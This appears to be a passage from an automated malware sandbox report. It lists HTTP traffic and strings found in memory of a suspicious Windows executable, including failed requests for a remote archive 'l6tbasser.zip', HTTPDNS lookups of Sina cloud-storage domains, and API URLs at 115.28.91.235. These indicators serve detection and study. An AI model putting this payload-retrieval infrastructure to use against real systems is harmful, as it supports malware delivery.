52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: df<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/l6tbasser.zip</Resource> <RequestId>345d03c2-2412-0521-2727-0894eff93894</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:27:21 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 74127bac-2412-0521-2730-0894eff93275x-error-code: NoSuchBucketData Raw: 64 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6c 36 74 62 61 73 73 65 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 34 31 32 37 62 61 63 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 33 30 2d 30 38 39 34 65 66 66 39 33 32 37 35 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: df<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/l6tbasser.zip</Resource> <RequestId>74127bac-2412-0521-2730-0894eff93275</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:27:30 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 32cd48c3-2412-0521-2732-b4055d7528f1x-error-code: NoSuchBucketData Raw: 64 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6c 36 74 62 61 73 73 65 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 63 64 34 38 63 33 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 33 32 2d 62 34 30 35 35 64 37 35 32 38 66 31 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: df<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/l6tbasser.zip</Resource> <RequestId>32cd48c3-2412-0521-2732-b4055d7528f1</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:27:55 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 32da782c-2412-0521-2757-b4055d752cc6x-error-code: NoSuchBucketData Raw: 64 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6c 36 74 62 61 73 73 65 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 64 61 37 38 32 63 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 35 37 2d 62 34 30 35 35 64 37 35 32 63 63 36 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: df<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/l6tbasser.zip</Resource> <RequestId>32da782c-2412-0521-2757-b4055d752cc6</RequestId></Error>0
      Source: D74384FB8D2C9.exe, 00000002.00000002.4587590988.000000000EB52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.1
      Source: D74384FB8D2C9.exe, 00000002.00000003.2593025818.000000000EB59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/
      Source: D74384FB8D2C9.exe, 00000002.00000003.2593025818.000000000EB59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/c
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2841831298.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2336822343.0000000005645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=
      Source: D74384FB8D2C9.exe, 00000002.00000003.2841831298.0000000005645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=/-
      Source: D74384FB8D2C9.exe, 00000002.00000003.2841831298.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.0000000005645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=cd
      Source: D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=dq
      Source: D74384FB8D2C9.exe, 00000002.00000003.2841831298.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2336822343.0000000005645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=fd
      Source: D74384FB8D2C9.exe, 00000002.00000002.4588166546.000000000EB9D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2841831298.000000000564D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.000000000564D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinacloud.net
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinacloud.net$3/
      Source: D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB90000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4588166546.000000000EB9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinacloud.net&
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563191406.0000000002E29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinacloud.net88701
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563191406.0000000002E29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinacloud.netC6753
      Source: D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D080000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinacloud.net~p
      Source: D74384FB8D2C9.exe, 00000002.00000002.4588166546.000000000EB9D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2841831298.000000000564D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.000000000564D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinastorage.cn
      Source: D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinastorage.cn$
      Source: D74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB9B000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB90000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4588166546.000000000EB9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinastorage.cn&
      Source: D74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB9B000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB90000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4588166546.000000000EB9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinastorage.cn&)Z
      Source: D74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB9B000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB90000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4588166546.000000000EB9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinastorage.cn&BZ?
      Source: D74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB9B000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB90000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4588166546.000000000EB9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinastorage.cn&PZ)
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563191406.0000000002E29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinastorage.cn6753I4
      Source: D74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinastorage.cnYwY
      Source: D74384FB8D2C9.exe, 00000002.00000003.2842042739.0000000005634000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2842244916.000000000563A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinastorage.cnd
      Source: D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinastorage.cnewu
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563191406.0000000002E29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinastorage.cnp4
      Source: D74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinastorage.cnqwa
      Source: D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinastorage.cnyp
      Source: D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB90000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinastorage.com
      Source: D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinastorage.com&
      Source: D74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB9B000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinastorage.com&:Y
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563191406.0000000002E29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinastorage.com4D/42
      Source: D74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinastorage.com5w%
      Source: D74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinastorage.com9w9
      Source: D74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB87000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinastorage.comUwE
      Source: D74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinastorage.comewu
      Source: D74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinastorage.comfZ
      Source: D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinastorage.comstio
      Source: FC14NMPKD.dll.2.drString found in binary or memory: http://115.28.91.235/api/fun.aspx
      Source: 8FD7ijlhc.exe.2.drString found in binary or memory: http://115.28.91.235/api/soft.aspx
      Source: D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29)
      Source: D74384FB8D2C9.exe, 00000002.00000003.2842042739.0000000005634000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2213442539.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2841831298.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2219757684.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2219458854.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2336822343.0000000005645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=
      Source: D74384FB8D2C9.exe, 00000002.00000003.2213442539.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2219757684.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2219458854.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2336822343.0000000005645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=BUS
      Source: D74384FB8D2C9.exe, 00000002.00000003.2841831298.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.0000000005645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=Tgd
      Source: D74384FB8D2C9.exe, 00000002.00000003.2336822343.0000000005645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=ca
      Source: D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=n=
      Source: D74384FB8D2C9.exe, 00000002.00000003.2841831298.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.0000000005645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=n=dd
      Source: D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sin
      Source: D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D080000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007D5A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2841831298.000000000564D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EBC4000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2336822343.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.000000000564D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinacloud.net
      Source: D74384FB8D2C9.exe, 00000002.00000003.3854584841.000000000EB59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinacloud.net&
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinacloud.net.LMEMPHD
      Source: D74384FB8D2C9.exe, 00000002.00000003.2841831298.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2336822343.0000000005645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinacloud.net.de5
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinacloud.net.net
      Source: D74384FB8D2C9.exe, 00000002.00000003.3854584841.000000000EB59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinacloud.net1
      Source: D74384FB8D2C9.exe, 00000002.00000003.2213442539.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2842042739.0000000005634000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2219458854.000000000564E000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2219757684.000000000564E000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.000000000564D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2336822343.000000000564E000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4588434411.0000000011410000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2841831298.000000000564D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.000000000564D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinacloud.net27.221.16.149;27.221.16.179
      Source: D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007D5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinacloud.net3
      Source: D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007D61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinacloud.netC:
      Source: D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EBAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinacloud.netOOC:
      Source: D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinacloud.netP8njJs
      Source: D74384FB8D2C9.exe, 00000002.00000003.3854584841.000000000EB59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinacloud.netm
      Source: D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2841831298.000000000564D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.000000000564D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinastorage.cn
      Source: D74384FB8D2C9.exe, 00000002.00000003.3854584841.000000000EB59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinastorage.cn4
      Source: D74384FB8D2C9.exe, 00000002.00000002.4567640195.000000000564D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2841831298.000000000564D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.000000000564D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinastorage.cn49.7.37.97
      Source: D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinastorage.cn49.7.37.97$
      Source: D74384FB8D2C9.exe, 00000002.00000003.2842042739.0000000005634000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2842244916.000000000563A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinastorage.cn49.7.37.97d
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinastorage.cnLMEMP
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinastorage.cnd?dn=sinacloud.net.net
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinastorage.cnsinacloud.net
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007D37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinastorage.com
      Source: D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinastorage.com&
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563191406.0000000002E29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinastorage.com14$
      Source: D74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinastorage.com16
      Source: D74384FB8D2C9.exe, 00000002.00000003.2841831298.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinastorage.com183.60.95.221
      Source: D74384FB8D2C9.exe, 00000002.00000003.3854584841.000000000EB59000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4587864880.000000000EB5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinastorage.comLMEMX
      Source: D74384FB8D2C9.exe, 00000002.00000003.2593025818.000000000EB59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinastorage.comLMEMX8H
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563191406.0000000002E29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinastorage.comg4
      Source: D74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinastorage.comn
      Source: D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007D37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://119.29.29.29/d?dn=sinastorage.comomC:
      Source: D74384FB8D2C9.exe, 00000002.00000003.2593025818.000000000EB59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/
      Source: D74384FB8D2C9.exe, 00000002.00000003.2593025818.000000000EB59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/-
      Source: D74384FB8D2C9.exe, 00000002.00000003.2842042739.0000000005634000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d
      Source: D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2336822343.0000000005645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=
      Source: D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=Gq
      Source: D74384FB8D2C9.exe, 00000002.00000003.2336822343.0000000005645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=cd
      Source: D74384FB8D2C9.exe, 00000002.00000003.2336822343.0000000005645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=dd
      Source: D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EBC4000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.000000000564D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinacloud.net
      Source: D74384FB8D2C9.exe, 00000002.00000002.4588434411.0000000011410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinacloud.net##
      Source: D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinacloud.net-w
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.254.116.116/d?dn=sinacloud.net033
